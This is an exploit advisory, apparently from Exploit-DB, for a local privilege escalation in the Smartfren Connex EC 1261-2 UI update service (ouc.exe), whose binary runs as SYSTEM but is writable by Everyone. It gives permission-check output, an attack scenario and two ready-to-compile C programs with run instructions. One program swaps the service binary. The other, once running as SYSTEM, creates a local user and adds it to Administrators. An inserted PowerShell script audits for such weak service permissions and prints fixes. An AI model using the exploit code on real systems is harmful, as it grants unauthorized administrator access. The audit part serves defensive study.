Smartfren Connex EC 1261-2 UI OUC – Local Privilege Escalation

  • Author: X-Cisadane
  • Date: 2012-09-27
  • Category: Desktop (Windows) Applications
  • Platform: Win32 & Win64
  • Source: https://www.exploit-db.com/exploits/21547/

==========================================================================
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
==========================================================================
    
:-------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
: # Date : 26 September 2012
: # Author : X-Cisadane
: # Software Link : http://www.smartfren.com/data/ec1261.html
: # File Version : 21.005.15.03.836
: # Category : Desktop (Windows) Applications
: # Platform : Win32 & Win64
: # Vulnerability : Local Privilege Escalation Vulnerability
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------------------------------------------------------------------------------------------------------------------------------:
Summary
========
Smartfren Connex EC 1261-2 UI OUC is part of the software shipped with the Smartfren Connex EC USB EVDO modem.
It is a background service (daemon) that updates the modem's files.
    
Description
===========
Improper file permissions on the application's executable allow local privilege escalation.
Any unprivileged local user can replace the executable with a binary of their choice.
The binary (ouc.exe) is registered by default as an auto-start service and is executed with SYSTEM privileges.
Tested on: Microsoft Windows 7 Ultimate 64 Bit (EN).
    
Proof of Concept
================
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
                                                                       BUILTIN\Users:F
                                                                       NT AUTHORITY\SYSTEM:(ID)F
                                                                       BUILTIN\Administrators:(ID)F

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Smartfren Connex EC1261-2 UI. OUC
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
    
----------------------------------------------------------------------------------------------
The following attack scenario could be used:
1. An attacker (unprivileged user) renames the Smartfren Connex EC1261-2 UI. OUC program file.
For example, the Smartfren Connex EC1261-2 UI. OUC program file is located at:
For Win32 ---> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
For Win64 ---> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
Rename the file to ouc.exe.old.
2. The attacker copies a malicious executable with the same name as the original file (ouc.exe) into the same location.
3. Restart the system.
After the restart, the attacker's malicious file is executed with SYSTEM privileges.
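The root cause shown by the cacls and sc output above is a service image that runs as LocalSystem at boot while low-privilege principals hold Full Control on the file. The following audit script is an added example, not part of the original advisory or the vendor's software: it enumerates every auto-start LocalSystem service on the host, inspects the ACL of each image file, and reports entries that grant write, delete, or full-control rights to Everyone, Users, Authenticated Users, or INTERACTIVE, then prints the icacls command that would restore a sane ACL. It assumes Windows PowerShell 5.1 or later with the CIM cmdlets; the principal list and the write-right mask are choices made here, not values from the page.

```powershell
# Added audit script (not from the original advisory). Finds auto-start services
# running as LocalSystem whose image file is writable by low-privilege users.
# Assumes Windows PowerShell 5.1+ with Get-CimInstance available.

# Principals every local user effectively belongs to (constructed list; extend as needed).
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the holder replace, alter or re-ACL the binary.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::WriteData -bor
                   [System.Security.AccessControl.FileSystemRights]::AppendData -bor
                   [System.Security.AccessControl.FileSystemRights]::Delete -bor
                   [System.Security.AccessControl.FileSystemRights]::WriteDac -bor
                   [System.Security.AccessControl.FileSystemRights]::WriteOwner -bor
                   [System.Security.AccessControl.FileSystemRights]::FullControl)

function Get-ServiceImagePath {
    # Extract the executable path from Win32_Service.PathName, which may be
    # quoted and may carry command-line arguments.
    param([Parameter(Mandatory)][string]$PathName)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^\s*(.+?\.exe)\b') { return $Matches[1] }
    return $PathName.Trim()
}

function Find-WritableSystemServiceImage {
    # One output object per (service, weak ACE) pair.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' } |
        ForEach-Object {
            $service = $_
            $image = Get-ServiceImagePath -PathName $service.PathName
            if (-not (Test-Path -LiteralPath $image -PathType Leaf)) { return }
            $acl = Get-Acl -LiteralPath $image
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
                if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
                # Cast to int so generic rights bits outside the named enum values still compare.
                if (([int]$ace.FileSystemRights -band $WriteMask) -eq 0) { continue }
                [pscustomobject]@{
                    Service   = $service.Name
                    Account   = $service.StartName
                    Image     = $image
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
}

# Report the findings.
$findings = Find-WritableSystemServiceImage
$findings | Format-Table -AutoSize

# For each affected image, print the remediation: drop inherited ACEs and grant
# Full Control only to SYSTEM and Administrators, read/execute to Users.
# Run the printed commands from an elevated prompt after confirming each path.
$findings | Select-Object -ExpandProperty Image -Unique | ForEach-Object {
    Write-Output ('icacls "{0}" /inheritance:r /grant:r "NT AUTHORITY\SYSTEM:(F)" "BUILTIN\Administrators:(F)" "BUILTIN\Users:(RX)"' -f $_)
}
```

On a host with the vulnerable build installed, the report would list the RunOuc service with Everyone and BUILTIN\Users holding FullControl on ouc.exe, matching the cacls output above; the same check applied to the UpdateDog directory itself is worthwhile too, since a writable parent directory allows the rename-and-replace step even when the file ACL is tight.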
    
You can also do it with these two simple programs:
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile the source below with Dev-C++.
Save it as C:\sploit.cpp.
    
#include <stdio.h>
#include <windows.h>
/* Service binary that runs as SYSTEM at startup (Win64 path; see P.S. for Win32). */
#define DEFAULT_TARGET "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
/* Where the original binary is moved so it can be restored later. */
#define DEFAULT_BACKUP "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
/* Replacement executable (built from bin.cpp below). */
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{
    /* Step 1: rename the original ouc.exe to ouc.exe.old. */
    MoveFile(DEFAULT_TARGET, DEFAULT_BACKUP);
    /* Step 2: put the replacement in place under the original name. */
    CopyFile(DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE);
    return 0;
}
     
    
Compile the source below with Dev-C++.
Save it as C:\bin.cpp.
    
#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
/* Runs as SYSTEM once the service starts: create a local user, then add it to Administrators. */
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
    STARTUPINFO si = {sizeof(STARTUPINFO)};
    PROCESS_INFORMATION pi;
    CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
    CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
    return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute sploit.exe, located in C:\.
Reboot Windows. After the reboot, run "net user" from a Command Prompt; if a user named xcisadane exists, the exploit succeeded.
P.S.: For Win32, change "Program Files (x86)" to "Program Files".